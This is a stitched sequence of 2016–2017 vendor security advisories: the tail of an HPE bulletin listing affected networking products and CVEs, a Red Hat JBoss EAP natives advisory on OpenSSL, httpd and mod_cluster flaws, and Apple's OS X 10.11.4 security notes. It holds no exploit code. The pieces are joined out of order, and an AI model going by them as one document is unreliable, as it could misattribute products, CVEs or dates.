- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- 5130HI (Comware 7) - Version: R1120
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
iMC Products
- IMC PLAT - Version: 7.2 E0403P04
- HP Network Products
- JD125A HP IMC Std S/W Platform w/100-node
- JD126A HP IMC Ent S/W Platform w/100-node
- JD808A HP IMC Ent Platform w/100-node License
- JD814A HP A-IMC Enterprise Edition Software DVD Media
- JD815A HP IMC Std Platform w/100-node License
- JD816A HP A-IMC Standard Edition Software DVD Media
- JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU
- JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
- JF377A HP IMC Std S/W Platform w/100-node Lic
- JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU
- JF378A HP IMC Ent S/W Platform w/200-node Lic
- JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU
- JG546AAE HP IMC Basic SW Platform w/50-node E-LTU
- JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
- JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU
- JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU
- JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU
- JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU
- IMC iNode - Version: 7.2 E0407
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
- iMC UAM_TAM - Version: 7.1 E0406
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
- IMC WSM - Version: 7.2 E0502P04
- HP Network Products
- JD456A HP IMC WSM Software Module with 50-Access Point License
- JF414A HP IMC Wireless Service Manager Software Module with 50-Access Point License
- JF414AAE HP IMC Wireless Service Manager Software Module with 50-Access Point E-LTU
- JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager Module Upgrade with 250 Access Point E-LTU
- JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU
- JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg with 250-node E-LTU
VCX Products
- VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 21 February 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
References:
CVE-2007-6750 CVE-2011-4969 CVE-2014-3508 CVE-2014-3509 CVE-2014-3511 CVE-2014-3513 CVE-2014-3569 CVE-2014-3568 CVE-2014-3567 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-0205 CVE-2015-3194 CVE-2015-3195 CVE-2015-3237 CVE-2015-6565 CVE-2015-7501 CVE-2015-7547 CVE-2015-7995 CVE-2015-8035 CVE-2016-0705 CVE-2016-0728 CVE-2016-0799 CVE-2016-2015 CVE-2016-2017 CVE-2016-2018 CVE-2016-2019 CVE-2016-2020 CVE-2016-2021 CVE-2016-2022 CVE-2016-2024 CVE-2016-2030 CVE-2016-2842 PSRT110092 PSRT110093 PSRT110094 PSRT110095 PSRT110096 PSRT110138
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.10 natives update on RHEL 7 Advisory ID: RHSA-2016:2054-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2054.html Issue date: 2016-10-12 CVE Names: CVE-2015-3183 CVE-2015-3195 CVE-2015-4000 CVE-2016-2105 CVE-2016-2106 CVE-2016-2108 CVE-2016-2109 CVE-2016-3110 CVE-2016-4459 =====================================================================
- Summary:
Updated packages that provide Red Hat JBoss Enterprise Application Platform 6.4.10 natives, fix several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7 Server - noarch, ppc64, x86_64
- Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.
This release includes bug fixes and enhancements, as well as a new release of OpenSSL that addresses a number of outstanding security flaws. For further information, see the knowledge base article linked to in the References section. All users of Red Hat JBoss Enterprise Application Platform 6.4 on Red Hat Enterprise Linux 7 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.
Security Fix(es):
-
A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. An attacker could use this flaw to create a specially crafted certificate which, when verified or re-encoded by OpenSSL, could cause it to crash, or execute arbitrary code using the permissions of the user running an application compiled against the OpenSSL library. (CVE-2016-2108)
-
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3183)
-
A memory leak vulnerability was found in the way OpenSSL parsed PKCS#7 and CMS data. (CVE-2015-3195)
-
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic. (CVE-2015-4000)
-
An integer overflow flaw, leading to a buffer overflow, was found in the way the EVP_EncodeUpdate() function of OpenSSL parsed very large amounts of input data. A remote attacker could use this flaw to crash an application using OpenSSL or, possibly, execute arbitrary code with the permissions of the user running that application. (CVE-2016-2105)
-
An integer overflow flaw, leading to a buffer overflow, was found in the way the EVP_EncryptUpdate() function of OpenSSL parsed very large amounts of input data. A remote attacker could use this flaw to crash an application using OpenSSL or, possibly, execute arbitrary code with the permissions of the user running that application. (CVE-2016-2106)
-
It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). (CVE-2016-3110)
-
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. An application using OpenSSL that accepts untrusted ASN.1 BIO input could be forced to allocate an excessive amount of data. (CVE-2016-2109)
-
It was discovered that specifying configuration with a JVMRoute path longer than 80 characters will cause segmentation fault leading to a server crash. (CVE-2016-4459)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108, CVE-2016-2105, and CVE-2016-2106 and Michal Karm Babacek for reporting CVE-2016-3110. The CVE-2016-4459 issue was discovered by Robert Bost (Red Hat). Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; and Guido Vranken as the original reporter of CVE-2016-2105 and CVE-2016-2106.
- Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1223211 - CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks 1243887 - CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1326320 - CVE-2016-3110 mod_cluster: remotely Segfault Apache http server 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow 1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute 1345989 - RHEL7 RPMs: Upgrade mod_cluster-native to 1.2.13.Final-redhat-1 1345993 - RHEL7 RPMs: Upgrade mod_jk to 1.2.41.redhat-1 1345997 - RHEL7 RPMs: Upgrade tomcat-native to 1.1.34
- Package List:
Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7 Server:
Source: hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.src.rpm httpd22-2.2.26-56.ep6.el7.src.rpm jbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.src.rpm mod_jk-1.2.41-2.redhat_4.ep6.el7.src.rpm tomcat-native-1.1.34-5.redhat_1.ep6.el7.src.rpm
noarch: jbcs-httpd24-1-3.jbcs.el7.noarch.rpm jbcs-httpd24-runtime-1-3.jbcs.el7.noarch.rpm
ppc64: hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm hornetq-native-debuginfo-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm httpd22-2.2.26-56.ep6.el7.ppc64.rpm httpd22-debuginfo-2.2.26-56.ep6.el7.ppc64.rpm httpd22-devel-2.2.26-56.ep6.el7.ppc64.rpm httpd22-manual-2.2.26-56.ep6.el7.ppc64.rpm httpd22-tools-2.2.26-56.ep6.el7.ppc64.rpm jbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-devel-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-libs-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-perl-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-static-1.0.2h-4.jbcs.el7.ppc64.rpm jbossas-hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm jbossas-jbossweb-native-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm mod_jk-ap22-1.2.41-2.redhat_4.ep6.el7.ppc64.rpm mod_jk-debuginfo-1.2.41-2.redhat_4.ep6.el7.ppc64.rpm mod_ldap22-2.2.26-56.ep6.el7.ppc64.rpm mod_ssl22-2.2.26-56.ep6.el7.ppc64.rpm tomcat-native-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm tomcat-native-debuginfo-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm
x86_64: hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm hornetq-native-debuginfo-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm httpd22-2.2.26-56.ep6.el7.x86_64.rpm httpd22-debuginfo-2.2.26-56.ep6.el7.x86_64.rpm httpd22-devel-2.2.26-56.ep6.el7.x86_64.rpm httpd22-manual-2.2.26-56.ep6.el7.x86_64.rpm httpd22-tools-2.2.26-56.ep6.el7.x86_64.rpm jbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-devel-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-libs-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-perl-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-static-1.0.2h-4.jbcs.el7.x86_64.rpm jbossas-hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm jbossas-jbossweb-native-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm mod_jk-ap22-1.2.41-2.redhat_4.ep6.el7.x86_64.rpm mod_jk-debuginfo-1.2.41-2.redhat_4.ep6.el7.x86_64.rpm mod_ldap22-2.2.26-56.ep6.el7.x86_64.rpm mod_ssl22-2.2.26-56.ep6.el7.x86_64.rpm tomcat-native-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm tomcat-native-debuginfo-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-3183 https://access.redhat.com/security/cve/CVE-2015-3195 https://access.redhat.com/security/cve/CVE-2015-4000 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-3110 https://access.redhat.com/security/cve/CVE-2016-4459 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/2688611 https://access.redhat.com/solutions/222023 https://access.redhat.com/documentation/en-US/JBoss_Enterprise_Application_Platform/6.4/index.html https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=appplatform&downloadType=securityPatches&version=6.4
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX/nCuXlSAg2UNWIIRAq6gAKCk3O4+LVrC6nN6yUHOOzpm8GB7NQCcDcA0 n7n6E5uqbAY0W1AG5Z+9yy8= =6ET2 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002
OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team
AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB
Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher
dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. This issue was addressed with improved validation. CVE-ID CVE-2016-1738 : beist and ABH of BoB
FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash
IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox
NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero
OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys
OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys
OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195
Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG
Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca
Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. This issue was addressed by updating to version 2.0.0-p648. CVE-ID CVE-2015-7551
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
Tcl
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3
Impact: Processing a maliciously crafted .png file may lead to
arbitrary code execution
Description: Multiple vulnerabilities existed in libpng versions
prior to 1.6.20. These were addressed by removing libpng.
CVE-ID
CVE-2015-8126 : Adam Mariš
TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171
OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
